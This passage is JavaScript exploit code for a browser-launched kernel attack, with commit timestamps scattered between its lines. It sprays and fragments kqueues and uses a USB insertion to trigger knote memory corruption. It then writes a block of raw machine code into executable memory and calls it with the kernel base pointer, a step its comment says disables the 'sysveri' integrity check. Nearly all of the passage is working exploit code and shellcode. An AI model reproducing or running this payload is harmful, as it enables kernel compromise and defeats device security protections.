p . write4 ( kevent . add32 ( 0x8 ) , 0xFFFF + 0x010000 ) ;
p . write4 ( kevent . add32 ( 0xC ) , 0x0 ) ;
p . write8 ( kevent . add32 ( 0x10 ) , 0x0 ) ;
2022-01-17 02:52:08 +01:00
p . write8 ( kevent . add32 ( 0x18 ) , 0x0 ) ;
//
{
2021-12-13 03:47:24 +01:00
for ( var i = 0 ; i < NUM _KQUEUES ; i ++ ) {
chain . fcall ( window . syscalls [ 363 ] , kqueues [ i ] , kevent , 0x1 , 0x0 , 0x0 , 0x0 ) ;
}
}
chain . run ( ) ;
//Fragment memory
{
2022-01-17 02:52:08 +01:00
for ( var i = 18 ; i < NUM _KQUEUES ; i += 2 ) {
2021-12-13 03:47:24 +01:00
chain . fcall ( window . syscalls [ 6 ] , kqueues [ i ] ) ;
}
}
chain . run ( ) ;
//Trigger OOB
alert ( "Insert USB now. do not close the dialog until notification pops, remove usb after closing it." ) ;
//Trigger corrupt knote
{
for ( var i = 1 ; i < NUM _KQUEUES ; i += 2 ) {
chain . fcall ( window . syscalls [ 6 ] , kqueues [ i ] ) ;
}
}
chain . run ( ) ;
2022-01-17 02:52:08 +01:00
2021-12-13 03:47:24 +01:00
if ( chain . syscall ( 23 , 0 ) . low == 0 ) {
2022-01-17 02:52:08 +01:00
{
//cleanup fake knote & release locked gadgets/stack.
chain . fcall ( window . syscalls [ 73 ] , 0x4000 , 0xC000 ) ;
chain . fcall ( window . syscalls [ 325 ] ) ;
}
chain . run ( ) ;
2021-12-13 03:47:24 +01:00
return ;
}
2021-12-18 05:30:41 +01:00
alert ( ` Failed to trigger the exploit, This happened because you plugged it in too late/early or not at all.
if you did plug it in then the kernel heap is slightly corrupted , this might cause panics later on .
closing this alert will crash the browser for you . ` );
2021-12-13 03:47:24 +01:00
p . write8 ( 0 , 0 ) ;
return ;
2021-12-18 16:19:46 +01:00
}
2022-01-17 02:52:08 +01:00
//This disables sysveri, see patch.s for more info
var patch _once = function ( ) {
var patch _buffer = chain . syscall ( 477 , 0x0 , 0x4000 , 0x7 , 0x1000 , 0xFFFFFFFF , 0 ) ;
var patch _buffer _view = p . array _from _address ( patch _buffer , 0x1000 ) ;
patch _buffer _view [ 0 ] = 0x00000BB8 ;
patch _buffer _view [ 1 ] = 0xFE894800 ;
patch _buffer _view [ 2 ] = 0x033D8D48 ;
patch _buffer _view [ 3 ] = 0x0F000000 ;
patch _buffer _view [ 4 ] = 0x4855C305 ;
patch _buffer _view [ 5 ] = 0x8B48E589 ;
patch _buffer _view [ 6 ] = 0x95E8087E ;
patch _buffer _view [ 7 ] = 0xE8000000 ;
patch _buffer _view [ 8 ] = 0x00000175 ;
patch _buffer _view [ 9 ] = 0x033615FF ;
patch _buffer _view [ 10 ] = 0x8B480000 ;
patch _buffer _view [ 11 ] = 0x0003373D ;
patch _buffer _view [ 12 ] = 0x3F8B4800 ;
patch _buffer _view [ 13 ] = 0x74FF8548 ;
patch _buffer _view [ 14 ] = 0x3D8D48EB ;
patch _buffer _view [ 15 ] = 0x0000029D ;
patch _buffer _view [ 16 ] = 0xF9358B48 ;
patch _buffer _view [ 17 ] = 0x48000002 ;
patch _buffer _view [ 18 ] = 0x0322158B ;
patch _buffer _view [ 19 ] = 0x8B480000 ;
patch _buffer _view [ 20 ] = 0x00D6E812 ;
patch _buffer _view [ 21 ] = 0x8D480000 ;
patch _buffer _view [ 22 ] = 0x00029F3D ;
patch _buffer _view [ 23 ] = 0x358B4800 ;
patch _buffer _view [ 24 ] = 0x000002E4 ;
patch _buffer _view [ 25 ] = 0x05158B48 ;
patch _buffer _view [ 26 ] = 0x48000003 ;
patch _buffer _view [ 27 ] = 0xB9E8128B ;
patch _buffer _view [ 28 ] = 0x48000000 ;
patch _buffer _view [ 29 ] = 0x02633D8D ;
patch _buffer _view [ 30 ] = 0x8B480000 ;
patch _buffer _view [ 31 ] = 0x0002BF35 ;
patch _buffer _view [ 32 ] = 0x158B4800 ;
patch _buffer _view [ 33 ] = 0x000002C8 ;
patch _buffer _view [ 34 ] = 0xE8128B48 ;
patch _buffer _view [ 35 ] = 0x0000009C ;
patch _buffer _view [ 36 ] = 0x7A3D8D48 ;
patch _buffer _view [ 37 ] = 0x48000002 ;
patch _buffer _view [ 38 ] = 0x02AA358B ;
patch _buffer _view [ 39 ] = 0x8B480000 ;
patch _buffer _view [ 40 ] = 0x0002AB15 ;
patch _buffer _view [ 41 ] = 0x128B4800 ;
patch _buffer _view [ 42 ] = 0x00007FE8 ;
patch _buffer _view [ 43 ] = 0x0185E800 ;
patch _buffer _view [ 44 ] = 0xC35D0000 ;
patch _buffer _view [ 45 ] = 0x6D3D8948 ;
patch _buffer _view [ 46 ] = 0x48000002 ;
patch _buffer _view [ 47 ] = 0x026E3D01 ;
patch _buffer _view [ 48 ] = 0x01480000 ;
patch _buffer _view [ 49 ] = 0x00026F3D ;
patch _buffer _view [ 50 ] = 0x3D014800 ;
patch _buffer _view [ 51 ] = 0x00000270 ;
patch _buffer _view [ 52 ] = 0x713D0148 ;
patch _buffer _view [ 53 ] = 0x48000002 ;
patch _buffer _view [ 54 ] = 0x02723D01 ;
patch _buffer _view [ 55 ] = 0x01480000 ;
patch _buffer _view [ 56 ] = 0x0002933D ;
patch _buffer _view [ 57 ] = 0x3D014800 ;
patch _buffer _view [ 58 ] = 0x00000294 ;
patch _buffer _view [ 59 ] = 0x653D0148 ;
patch _buffer _view [ 60 ] = 0x48000002 ;
patch _buffer _view [ 61 ] = 0x02663D01 ;
patch _buffer _view [ 62 ] = 0x01480000 ;
patch _buffer _view [ 63 ] = 0x0002873D ;
patch _buffer _view [ 64 ] = 0x3D014800 ;
patch _buffer _view [ 65 ] = 0x00000288 ;
patch _buffer _view [ 66 ] = 0x893D0148 ;
patch _buffer _view [ 67 ] = 0x48000002 ;
patch _buffer _view [ 68 ] = 0x028A3D01 ;
patch _buffer _view [ 69 ] = 0x01480000 ;
patch _buffer _view [ 70 ] = 0x00028B3D ;
patch _buffer _view [ 71 ] = 0x3D014800 ;
patch _buffer _view [ 72 ] = 0x0000024C ;
patch _buffer _view [ 73 ] = 0x3D3D0148 ;
patch _buffer _view [ 74 ] = 0xC3000002 ;
patch _buffer _view [ 75 ] = 0xE5894855 ;
patch _buffer _view [ 76 ] = 0x10EC8348 ;
patch _buffer _view [ 77 ] = 0x24348948 ;
patch _buffer _view [ 78 ] = 0x24548948 ;
patch _buffer _view [ 79 ] = 0xED15FF08 ;
patch _buffer _view [ 80 ] = 0x48000001 ;
patch _buffer _view [ 81 ] = 0x4B74C085 ;
patch _buffer _view [ 82 ] = 0x48C28948 ;
patch _buffer _view [ 83 ] = 0x4840408B ;
patch _buffer _view [ 84 ] = 0x2F74C085 ;
patch _buffer _view [ 85 ] = 0x28788B48 ;
patch _buffer _view [ 86 ] = 0x243C3B48 ;
patch _buffer _view [ 87 ] = 0x8B480A74 ;
patch _buffer _view [ 88 ] = 0xC0854800 ;
patch _buffer _view [ 89 ] = 0xECEB1D74 ;
patch _buffer _view [ 90 ] = 0x18788B48 ;
patch _buffer _view [ 91 ] = 0x74FF8548 ;
patch _buffer _view [ 92 ] = 0x7F8B48ED ;
patch _buffer _view [ 93 ] = 0x7C3B4810 ;
patch _buffer _view [ 94 ] = 0xE2750824 ;
patch _buffer _view [ 95 ] = 0xFF1040C7 ;
patch _buffer _view [ 96 ] = 0x48FFFFFF ;
patch _buffer _view [ 97 ] = 0x31107A8D ;
patch _buffer _view [ 98 ] = 0x31D231F6 ;
patch _buffer _view [ 99 ] = 0xA515FFC9 ;
patch _buffer _view [ 100 ] = 0x48000001 ;
patch _buffer _view [ 101 ] = 0x5D10C483 ;
patch _buffer _view [ 102 ] = 0x894855C3 ;
patch _buffer _view [ 103 ] = 0xC0200FE5 ;
patch _buffer _view [ 104 ] = 0xFFFF2548 ;
patch _buffer _view [ 105 ] = 0x220FFFFE ;
patch _buffer _view [ 106 ] = 0x3D8B48C0 ;
patch _buffer _view [ 107 ] = 0x000001C8 ;
patch _buffer _view [ 108 ] = 0x909007C7 ;
patch _buffer _view [ 109 ] = 0x47C79090 ;
patch _buffer _view [ 110 ] = 0x48909004 ;
patch _buffer _view [ 111 ] = 0x358B48B8 ;
patch _buffer _view [ 112 ] = 0x000001AC ;
patch _buffer _view [ 113 ] = 0x08778948 ;
patch _buffer _view [ 114 ] = 0x651047C7 ;
patch _buffer _view [ 115 ] = 0xC73C8B48 ;
patch _buffer _view [ 116 ] = 0x00251447 ;
patch _buffer _view [ 117 ] = 0x47C70000 ;
patch _buffer _view [ 118 ] = 0x89480018 ;
patch _buffer _view [ 119 ] = 0x1C47C738 ;
patch _buffer _view [ 120 ] = 0xB8489090 ;
patch _buffer _view [ 121 ] = 0x7D358B48 ;
patch _buffer _view [ 122 ] = 0x48000001 ;
patch _buffer _view [ 123 ] = 0xC7207789 ;
patch _buffer _view [ 124 ] = 0xC7482847 ;
patch _buffer _view [ 125 ] = 0x47C70100 ;
patch _buffer _view [ 126 ] = 0x0000002C ;
patch _buffer _view [ 127 ] = 0x778D48E9 ;
patch _buffer _view [ 128 ] = 0x158B4834 ;
patch _buffer _view [ 129 ] = 0x00000150 ;
patch _buffer _view [ 130 ] = 0x89F22948 ;
patch _buffer _view [ 131 ] = 0x8B483057 ;
patch _buffer _view [ 132 ] = 0x00016B35 ;
patch _buffer _view [ 133 ] = 0x568D4800 ;
patch _buffer _view [ 134 ] = 0xD7294805 ;
patch _buffer _view [ 135 ] = 0xC148FF89 ;
patch _buffer _view [ 136 ] = 0x814808E7 ;
patch _buffer _view [ 137 ] = 0x0000E9CF ;
patch _buffer _view [ 138 ] = 0x3E894800 ;
patch _buffer _view [ 139 ] = 0x00000D48 ;
patch _buffer _view [ 140 ] = 0x220F0001 ;
patch _buffer _view [ 141 ] = 0x55C35DC0 ;
patch _buffer _view [ 142 ] = 0x0FE58948 ;
patch _buffer _view [ 143 ] = 0x2548C020 ;
patch _buffer _view [ 144 ] = 0xFFFEFFFF ;
patch _buffer _view [ 145 ] = 0x48C0220F ;
patch _buffer _view [ 146 ] = 0x013A3D8B ;
patch _buffer _view [ 147 ] = 0x07C70000 ;
patch _buffer _view [ 148 ] = 0x00C3C031 ;
patch _buffer _view [ 149 ] = 0x353D8B48 ;
patch _buffer _view [ 150 ] = 0xC7000001 ;
patch _buffer _view [ 151 ] = 0xC3C03107 ;
patch _buffer _view [ 152 ] = 0x3D8B4800 ;
patch _buffer _view [ 153 ] = 0x00000130 ;
patch _buffer _view [ 154 ] = 0xC03107C7 ;
patch _buffer _view [ 155 ] = 0x8B4800C3 ;
patch _buffer _view [ 156 ] = 0x00012B3D ;
patch _buffer _view [ 157 ] = 0x3107C700 ;
patch _buffer _view [ 158 ] = 0x4800C3C0 ;
patch _buffer _view [ 159 ] = 0x00A63D8B ;
patch _buffer _view [ 160 ] = 0x87C70000 ;
patch _buffer _view [ 161 ] = 0x001F1E01 ;
patch _buffer _view [ 162 ] = 0x9090F631 ;
patch _buffer _view [ 163 ] = 0x1E0587C7 ;
patch _buffer _view [ 164 ] = 0xC931001F ;
patch _buffer _view [ 165 ] = 0x87C79090 ;
patch _buffer _view [ 166 ] = 0x001F1E09 ;
patch _buffer _view [ 167 ] = 0x9090D231 ;
patch _buffer _view [ 168 ] = 0x1E3E87C7 ;
patch _buffer _view [ 169 ] = 0xC931001F ;
patch _buffer _view [ 170 ] = 0x0D489090 ;
patch _buffer _view [ 171 ] = 0x00010000 ;
patch _buffer _view [ 172 ] = 0xFFC0220F ;
patch _buffer _view [ 173 ] = 0x0000EF15 ;
patch _buffer _view [ 174 ] = 0xC0200F00 ;
patch _buffer _view [ 175 ] = 0xFFFF2548 ;
patch _buffer _view [ 176 ] = 0x220FFFFE ;
patch _buffer _view [ 177 ] = 0x3D8B48C0 ;
patch _buffer _view [ 178 ] = 0x000000DC ;
patch _buffer _view [ 179 ] = 0xC03107C7 ;
patch _buffer _view [ 180 ] = 0x0D4800C3 ;
patch _buffer _view [ 181 ] = 0x00010000 ;
patch _buffer _view [ 182 ] = 0x5DC0220F ;
patch _buffer _view [ 183 ] = 0x737973C3 ;
patch _buffer _view [ 184 ] = 0x5F6D6574 ;
patch _buffer _view [ 185 ] = 0x70737573 ;
patch _buffer _view [ 186 ] = 0x5F646E65 ;
patch _buffer _view [ 187 ] = 0x73616870 ;
patch _buffer _view [ 188 ] = 0x705F3265 ;
patch _buffer _view [ 189 ] = 0x735F6572 ;
patch _buffer _view [ 190 ] = 0x00636E79 ;
patch _buffer _view [ 191 ] = 0x74737973 ;
patch _buffer _view [ 192 ] = 0x725F6D65 ;
patch _buffer _view [ 193 ] = 0x6D757365 ;
patch _buffer _view [ 194 ] = 0x68705F65 ;
patch _buffer _view [ 195 ] = 0x32657361 ;
patch _buffer _view [ 196 ] = 0x73797300 ;
patch _buffer _view [ 197 ] = 0x5F6D6574 ;
patch _buffer _view [ 198 ] = 0x75736572 ;
patch _buffer _view [ 199 ] = 0x705F656D ;
patch _buffer _view [ 200 ] = 0x65736168 ;
patch _buffer _view [ 201 ] = 0x90900033 ;
patch _buffer _view [ 202 ] = 0x00000000 ;
patch _buffer _view [ 203 ] = 0x00000000 ;
patch _buffer _view [ 204 ] = 0x000F88F0 ;
patch _buffer _view [ 205 ] = 0x00000000 ;
patch _buffer _view [ 206 ] = 0x002EF170 ;
patch _buffer _view [ 207 ] = 0x00000000 ;
patch _buffer _view [ 208 ] = 0x00018DF0 ;
patch _buffer _view [ 209 ] = 0x00000000 ;
patch _buffer _view [ 210 ] = 0x00018EF0 ;
patch _buffer _view [ 211 ] = 0x00000000 ;
patch _buffer _view [ 212 ] = 0x02654110 ;
patch _buffer _view [ 213 ] = 0x00000000 ;
patch _buffer _view [ 214 ] = 0x00097230 ;
patch _buffer _view [ 215 ] = 0x00000000 ;
patch _buffer _view [ 216 ] = 0x00402E60 ;
patch _buffer _view [ 217 ] = 0x00000000 ;
patch _buffer _view [ 218 ] = 0x01520108 ;
patch _buffer _view [ 219 ] = 0x00000000 ;
patch _buffer _view [ 220 ] = 0x01520100 ;
patch _buffer _view [ 221 ] = 0x00000000 ;
patch _buffer _view [ 222 ] = 0x00462D20 ;
patch _buffer _view [ 223 ] = 0x00000000 ;
patch _buffer _view [ 224 ] = 0x00462DFC ;
patch _buffer _view [ 225 ] = 0x00000000 ;
patch _buffer _view [ 226 ] = 0x006259A0 ;
patch _buffer _view [ 227 ] = 0x00000000 ;
patch _buffer _view [ 228 ] = 0x006268D0 ;
patch _buffer _view [ 229 ] = 0x00000000 ;
patch _buffer _view [ 230 ] = 0x00625DC0 ;
patch _buffer _view [ 231 ] = 0x00000000 ;
patch _buffer _view [ 232 ] = 0x00626290 ;
patch _buffer _view [ 233 ] = 0x00000000 ;
patch _buffer _view [ 234 ] = 0x00626720 ;
patch _buffer _view [ 235 ] = 0x00000000 ;
//lock payload / call payload / release payload
{
chain . fcall ( window . syscalls [ 203 ] , patch _buffer , 0x4000 ) ;
chain . fcall ( patch _buffer , p . read8 ( KERNEL _BASE _PTR ) ) ;
chain . fcall ( window . syscalls [ 73 ] , patch _buffer , 0x4000 ) ;
}
chain . run ( ) ;
}